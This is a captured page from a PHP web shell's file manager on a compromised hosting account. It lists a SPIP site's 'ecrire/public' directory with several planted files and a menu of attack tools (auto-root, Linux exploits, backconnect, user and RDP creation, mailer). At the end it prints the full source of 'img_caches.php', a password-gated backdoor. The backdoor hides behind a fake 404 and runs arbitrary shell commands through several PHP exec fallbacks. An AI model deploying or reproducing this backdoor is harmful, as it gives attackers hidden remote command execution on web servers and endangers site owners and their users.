Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
lchg /
ecrire /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
Nx_.php
397
B
-rw-rw-rw-
Vp_.php
397
B
-rw-rw-rw-
admin.php
2.04
KB
-rw----r--
aiguiller.php
11.59
KB
-rw----r--
assembler.php
25.09
KB
-rw----r--
balises.php
76.06
KB
-rw----r--
boucles.php
3.34
KB
-rw----r--
cacher.php
13.75
KB
-rw----r--
compiler.php
48.79
KB
-rw----r--
composer.php
32.05
KB
-rw----r--
criteres.php
100.89
KB
-rw----r--
debusquer.php
26.84
KB
-rw----r--
decompiler.php
6.3
KB
-rw----r--
evaluer_page.php
2.57
KB
-rw----r--
fonctions.php
20.62
KB
-rw----r--
format_html.php
3.89
KB
-rw----r--
img_cache.php
700
B
-rw-rw-rw-
img_caches.php
700
B
-rw-rw-rw-
img_gnkp7r.php
1.57
KB
-rw-rw-rw-
img_k2ybka.php
1.57
KB
-rw-rw-rw-
index.php
2
B
-rw----r--
interfaces.php
6.17
KB
-rw----r--
jointures.php
20.61
KB
-rw----r--
normaliser.php
5.36
KB
-rw----r--
parametrer.php
10.31
KB
-rw----r--
phraser_html.php
40.03
KB
-rw----r--
quete.php
19.87
KB
-rw----r--
references.php
32.04
KB
-rw----r--
sandbox.php
7.56
KB
-rw----r--
sitemange.php
4.14
KB
-rw-rw-rw-
styliser.php
5.78
KB
-rw----r--
styliser_par_z.php
13.12
KB
-rw----r--
tracer.php
5.94
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : img_caches.php
<?php @error_reporting(0);@ini_set('display_errors',0); header('X-Nx:Vp-zD1'); if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='vLe'){http_response_code(404);die();} $c=@$_REQUEST['c']??''; if($c===''){echo '<pre>Vp-zD1 active</pre>';die();} $o=''; if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);} elseif(function_exists('shell_exec')){$o=@shell_exec($c);} elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);} else{$o='[no exec]';} echo '<pre>'.htmlspecialchars($o).'</pre>'; ?>
Close